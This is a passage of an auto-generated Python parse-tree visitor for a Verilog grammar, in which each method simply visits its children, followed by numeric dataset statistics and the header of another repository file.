# Visit a parse tree produced by VerexParser#list_of_net_decl_assignments.
def visitList_of_net_decl_assignments(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#list_of_param_assignments.
def visitList_of_param_assignments(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#list_of_specparam_assignments.
def visitList_of_specparam_assignments(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#list_of_real_identifiers.
def visitList_of_real_identifiers(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#list_of_variable_identifiers.
def visitList_of_variable_identifiers(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#list_of_variable_port_identifiers.
def visitList_of_variable_port_identifiers(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#net_decl_assignment.
def visitNet_decl_assignment(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#param_assignment.
def visitParam_assignment(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#specparam_assignment.
def visitSpecparam_assignment(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#pulse_control_specparam.
def visitPulse_control_specparam(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#error_limit_value.
def visitError_limit_value(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#reject_limit_value.
def visitReject_limit_value(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#limit_value.
def visitLimit_value(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#function_declaration.
def visitFunction_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#function_item_declaration.
def visitFunction_item_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#function_port_list.
def visitFunction_port_list(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#function_port.
def visitFunction_port(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#range_or_type.
def visitRange_or_type(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#task_declaration.
def visitTask_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#task_item_declaration.
def visitTask_item_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#task_port_list.
def visitTask_port_list(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#task_port_item.
def visitTask_port_item(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#tf_decl_header.
def visitTf_decl_header(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#tf_declaration.
def visitTf_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#task_port_type.
def visitTask_port_type(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#block_item_declaration.
def visitBlock_item_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#block_reg_declaration.
def visitBlock_reg_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#list_of_block_variable_identifiers.
def visitList_of_block_variable_identifiers(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#block_variable_type.
def visitBlock_variable_type(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#gate_instantiation.
def visitGate_instantiation(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#cmos_switch_instance.
def visitCmos_switch_instance(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#enable_gate_instance.
def visitEnable_gate_instance(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#mos_switch_instance.
def visitMos_switch_instance(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#n_input_gate_instance.
def visitN_input_gate_instance(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#n_output_gate_instance.
def visitN_output_gate_instance(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#pass_switch_instance.
def visitPass_switch_instance(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#pass_enable_switch_instance.
def visitPass_enable_switch_instance(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#pull_gate_instance.
def visitPull_gate_instance(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#name_of_gate_instance.
def visitName_of_gate_instance(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#pulldown_strength.
def visitPulldown_strength(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#pullup_strength.
def visitPullup_strength(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#enable_terminal.
def visitEnable_terminal(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#ncontrol_terminal.
def visitNcontrol_terminal(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#pcontrol_terminal.
def visitPcontrol_terminal(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#input_terminal.
def visitInput_terminal(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#inout_terminal.
def visitInout_terminal(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#output_terminal.
def visitOutput_terminal(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#cmos_switchtype.
def visitCmos_switchtype(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#enable_gatetype.
def visitEnable_gatetype(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#mos_switchtype.
def visitMos_switchtype(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#n_input_gatetype.
def visitN_input_gatetype(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#n_output_gatetype.
def visitN_output_gatetype(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#pass_en_switchtype.
def visitPass_en_switchtype(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#pass_switchtype.
def visitPass_switchtype(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#module_instantiation.
def visitModule_instantiation(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#parameter_value_assignment.
def visitParameter_value_assignment(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#ordered_parameter_assignment.
def visitOrdered_parameter_assignment(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#named_parameter_assignment.
def visitNamed_parameter_assignment(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#name_of_instance.
def visitName_of_instance(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#ordered_port_connection.
def visitOrdered_port_connection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#named_port_connection.
def visitNamed_port_connection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#generated_instantiation.
def visitGenerated_instantiation(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#generate_item_or_null.
def visitGenerate_item_or_null(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#generate_item.
def visitGenerate_item(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#generate_conditional_statement.
def visitGenerate_conditional_statement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#generate_case_statement.
def visitGenerate_case_statement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#genvar_case_item.
def visitGenvar_case_item(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#generate_loop_statement.
def visitGenerate_loop_statement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#genvar_assignment.
def visitGenvar_assignment(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#generate_block.
def visitGenerate_block(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#continuous_assign.
def visitContinuous_assign(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#list_of_net_assignments.
def visitList_of_net_assignments(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#net_assignment.
def visitNet_assignment(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#initial_construct.
def visitInitial_construct(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#always_construct.
def visitAlways_construct(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#blocking_assignment.
def visitBlocking_assignment(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#nonblocking_assignment.
def visitNonblocking_assignment(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#procedural_continuous_assignments.
def visitProcedural_continuous_assignments(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#function_blocking_assignment.
def visitFunction_blocking_assignment(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#function_statement_or_null.
def visitFunction_statement_or_null(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#function_seq_block.
def visitFunction_seq_block(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#variable_assignment.
def visitVariable_assignment(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#par_block.
def visitPar_block(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#seq_block.
def visitSeq_block(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#statement.
def visitStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#statement_or_null.
def visitStatement_or_null(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#function_statement.
def visitFunction_statement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#delay_or_event_control.
def visitDelay_or_event_control(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#delay_control.
def visitDelay_control(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#disable_statement.
def visitDisable_statement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#event_control.
def visitEvent_control(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#event_trigger.
def visitEvent_trigger(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#event_expression.
def visitEvent_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#event_primary.
def visitEvent_primary(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#procedural_timing_control_statement.
def visitProcedural_timing_control_statement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#wait_statement.
def visitWait_statement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#if_else_if_statement.
def visitIf_else_if_statement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#function_if_else_if_statement.
def visitFunction_if_else_if_statement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#case_statement.
def visitCase_statement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#case_item.
def visitCase_item(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#function_case_statement.
def visitFunction_case_statement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#function_case_item.
def visitFunction_case_item(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#function_loop_statement.
def visitFunction_loop_statement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#loop_statement.
def visitLoop_statement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#system_task_enable.
def visitSystem_task_enable(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#task_enable.
def visitTask_enable(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#specify_block.
def visitSpecify_block(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#specify_item.
def visitSpecify_item(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#pulsestyle_declaration.
def visitPulsestyle_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#showcancelled_declaration.
def visitShowcancelled_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#path_declaration.
def visitPath_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#simple_path_declaration.
def visitSimple_path_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#parallel_path_description.
def visitParallel_path_description(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#full_path_description.
def visitFull_path_description(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#list_of_path_inputs.
def visitList_of_path_inputs(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#list_of_path_outputs.
def visitList_of_path_outputs(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#specify_input_terminal_descriptor.
def visitSpecify_input_terminal_descriptor(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#specify_output_terminal_descriptor.
def visitSpecify_output_terminal_descriptor(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#input_identifier.
def visitInput_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#output_identifier.
def visitOutput_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#path_delay_value.
def visitPath_delay_value(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#list_of_path_delay_expressions.
def visitList_of_path_delay_expressions(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#t_path_delay_expression.
def visitT_path_delay_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#trise_path_delay_expression.
def visitTrise_path_delay_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#tfall_path_delay_expression.
def visitTfall_path_delay_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#tz_path_delay_expression.
def visitTz_path_delay_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#t01_path_delay_expression.
def visitT01_path_delay_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#t10_path_delay_expression.
def visitT10_path_delay_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#t0z_path_delay_expression.
def visitT0z_path_delay_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#tz1_path_delay_expression.
def visitTz1_path_delay_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#t1z_path_delay_expression.
def visitT1z_path_delay_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#tz0_path_delay_expression.
def visitTz0_path_delay_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#t0x_path_delay_expression.
def visitT0x_path_delay_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#tx1_path_delay_expression.
def visitTx1_path_delay_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#t1x_path_delay_expression.
def visitT1x_path_delay_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#tx0_path_delay_expression.
def visitTx0_path_delay_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#txz_path_delay_expression.
def visitTxz_path_delay_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#tzx_path_delay_expression.
def visitTzx_path_delay_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#path_delay_expression.
def visitPath_delay_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#edge_sensitive_path_declaration.
def visitEdge_sensitive_path_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#parallel_edge_sensitive_path_description.
def visitParallel_edge_sensitive_path_description(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#full_edge_sensitive_path_description.
def visitFull_edge_sensitive_path_description(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#data_source_expression.
def visitData_source_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#edge_identifier.
def visitEdge_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#state_dependent_path_declaration.
def visitState_dependent_path_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#polarity_operator.
def visitPolarity_operator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#checktime_condition.
def visitChecktime_condition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#delayed_data.
def visitDelayed_data(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#delayed_reference.
def visitDelayed_reference(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#end_edge_offset.
def visitEnd_edge_offset(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#event_based_flag.
def visitEvent_based_flag(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#notify_reg.
def visitNotify_reg(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#remain_active_flag.
def visitRemain_active_flag(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#stamptime_condition.
def visitStamptime_condition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#start_edge_offset.
def visitStart_edge_offset(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#threshold.
def visitThreshold(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#timing_check_limit.
def visitTiming_check_limit(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#concatenation.
def visitConcatenation(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#constant_concatenation.
def visitConstant_concatenation(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#constant_multiple_concatenation.
def visitConstant_multiple_concatenation(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#module_path_concatenation.
def visitModule_path_concatenation(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#module_path_multiple_concatenation.
def visitModule_path_multiple_concatenation(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#multiple_concatenation.
def visitMultiple_concatenation(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#net_concatenation.
def visitNet_concatenation(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#variable_concatenation.
def visitVariable_concatenation(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#variable_concatenation_value.
def visitVariable_concatenation_value(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#constant_function_call.
def visitConstant_function_call(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#function_call.
def visitFunction_call(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#system_function_call.
def visitSystem_function_call(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#genvar_function_call.
def visitGenvar_function_call(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#base_expression.
def visitBase_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#constant_base_expression.
def visitConstant_base_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#constant_expression.
def visitConstant_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#constant_mintypmax_expression.
def visitConstant_mintypmax_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#constant_range_expression.
def visitConstant_range_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#dimension_constant_expression.
def visitDimension_constant_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#term.
def visitTerm(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#lsb_constant_expression.
def visitLsb_constant_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#mintypmax_expression.
def visitMintypmax_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#module_path_conditional_expression.
def visitModule_path_conditional_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#module_path_expression.
def visitModule_path_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#module_path_mintypmax_expression.
def visitModule_path_mintypmax_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#msb_constant_expression.
def visitMsb_constant_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#width_constant_expression.
def visitWidth_constant_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#constant_primary.
def visitConstant_primary(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#module_path_primary.
def visitModule_path_primary(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#unary_operator.
def visitUnary_operator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#binary_operator.
def visitBinary_operator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#unary_module_path_operator.
def visitUnary_module_path_operator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#binary_module_path_operator.
def visitBinary_module_path_operator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#number.
def visitNumber(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#timing_spec.
def visitTiming_spec(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#attribute_instance.
def visitAttribute_instance(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#attr_spec.
def visitAttr_spec(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#attr_name.
def visitAttr_name(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#block_identifier.
def visitBlock_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#cell_identifier.
def visitCell_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#config_identifier.
def visitConfig_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#escaped_arrayed_identifier.
def visitEscaped_arrayed_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#event_identifier.
def visitEvent_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#function_identifier.
def visitFunction_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#gate_instance_identifier.
def visitGate_instance_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#generate_block_identifier.
def visitGenerate_block_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#genvar_function_identifier.
def visitGenvar_function_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#genvar_identifier.
def visitGenvar_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#hierarchical_block_identifier.
def visitHierarchical_block_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#hierarchical_event_identifier.
def visitHierarchical_event_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#hierarchical_function_identifier.
def visitHierarchical_function_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#hierarchical_identifier.
def visitHierarchical_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#hierarchical_net_identifier.
def visitHierarchical_net_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#hierarchical_variable_identifier.
def visitHierarchical_variable_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#hierarchical_task_identifier.
def visitHierarchical_task_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#inout_port_identifier.
def visitInout_port_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#input_port_identifier.
def visitInput_port_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#instance_identifier.
def visitInstance_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#library_identifier.
def visitLibrary_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#memory_identifier.
def visitMemory_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#module_identifier.
def visitModule_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#module_instance_identifier.
def visitModule_instance_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#net_identifier.
def visitNet_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#output_port_identifier.
def visitOutput_port_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#parameter_identifier.
def visitParameter_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#port_identifier.
def visitPort_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#real_identifier.
def visitReal_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#simple_arrayed_identifier.
def visitSimple_arrayed_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#specparam_identifier.
def visitSpecparam_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#system_function_identifier.
def visitSystem_function_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#system_task_identifier.
def visitSystem_task_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#task_identifier.
def visitTask_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#terminal_identifier.
def visitTerminal_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#topmodule_identifier.
def visitTopmodule_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#udp_identifier.
def visitUdp_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#udp_instance_identifier.
def visitUdp_instance_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#variable_identifier.
def visitVariable_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#simple_hierarchical_branch.
def visitSimple_hierarchical_branch(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#escaped_hierarchical_branch.
def visitEscaped_hierarchical_branch(self, ctx):
return self.visitChildren(ctx)
| 31.346564 | 90 | 0.738873 | 6,535 | 52,913 | 5.809028 | 0.06075 | 0.053264 | 0.088773 | 0.159791 | 0.759496 | 0.750435 | 0.749618 | 0.74867 | 0.746852 | 0.746852 | 0 | 0.000871 | 0.197437 | 52,913 | 1,687 | 91 | 31.365145 | 0.893067 | 0.405307 | 0 | 0.498516 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.498516 | false | 0.005935 | 0.001484 | 0.498516 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 9 |
c66e9aadf1c1f45b215c2f07bb4f3301f63abe45 | 77,338 | py | Python | aea/helpers/search/models_pb2.py | bryanchriswhite/agents-aea | d3f177a963eb855d9528555167255bf2b478f4ba | [
"Apache-2.0"
] | 126 | 2019-09-07T09:32:44.000Z | 2022-03-29T14:28:41.000Z | aea/helpers/search/models_pb2.py | salman6049/agents-aea | d3f177a963eb855d9528555167255bf2b478f4ba | [
"Apache-2.0"
